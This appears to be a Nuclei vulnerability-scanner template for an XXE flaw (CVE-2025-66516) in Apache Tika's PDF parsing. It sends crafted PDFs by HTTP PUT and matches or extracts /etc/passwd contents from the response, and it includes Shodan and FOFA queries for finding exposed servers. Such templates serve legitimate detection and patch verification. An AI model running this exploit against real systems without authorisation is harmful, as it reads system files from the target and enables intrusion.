id: CVE-2025-66516

info:
  name: Apache Tika - XML External Entity Injection
  author: MathematicianGoat
  severity: high
  description: |
    Apache Tika tika-core (1.13 through 3.2.1), tika-pdf-module (2.0.0 through 3.2.1), and tika-parsers (1.13 through 1.28.5) contain an XML External Entity (XXE) injection in the processing of crafted XFA forms embedded in PDFs. It is exploitable remotely: an attacker only needs to submit a crafted PDF for parsing.
  impact: |
    Attackers can exploit the XXE to read local files or cause a denial of service, potentially exposing sensitive information or disrupting the service.
  remediation: |
    Upgrade tika-core to >= 3.2.2 and ensure tika-pdf-module and tika-parsers are updated to the latest versions.
  reference:
    - https://github.com/chasingimpact/CVE-2025-66516-Writeup-POC
    - https://nvd.nist.gov/vuln/detail/CVE-2025-66516
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 9.8
    cve-id: CVE-2025-66516
    epss-score: 0.06091
    epss-percentile: 0.9049
    cwe-id: CWE-611
  metadata:
    max-request: 2
    verified: true
    shodan-query: title:"Apache Tika"
    fofa-query: title="Apache Tika"
  tags: cve,cve2025,apache,tika,xxe,pdf,lfr

variables:
  passwd_payload: "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"
  canary_payload: "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"

http:
  - raw:
      - |
        PUT /tika HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/pdf

        {{base64_decode(passwd_payload)}}
      - |
        PUT /tika HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/pdf

        {{base64_decode(canary_payload)}}

    stop-at-first-match: true
    matchers-condition: or
    matchers:
      - type: regex
        part: body_1
        regex:
          - "root:.*:0:0:"

      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - 'contains_any(body_2, "FileNotFoundException", "No such file", "xxe_test_nonexistent")'
        condition: and

    extractors:
      - type: regex
        part: body_1
        group: 1
        regex:
          - 'data:\s*(root:x:0:0:[^\n]+)'
# digest: 4a0a00473045022100a84c6f718649a7e773ff98142bbb3216bb25b4fe1357092107672a40beaf8a6c02205e523258787f8381741e9b23361cf916ba50383e3802e0e974b2b319ffd8c5ba:922c64590222798bb761d5b6d8e72950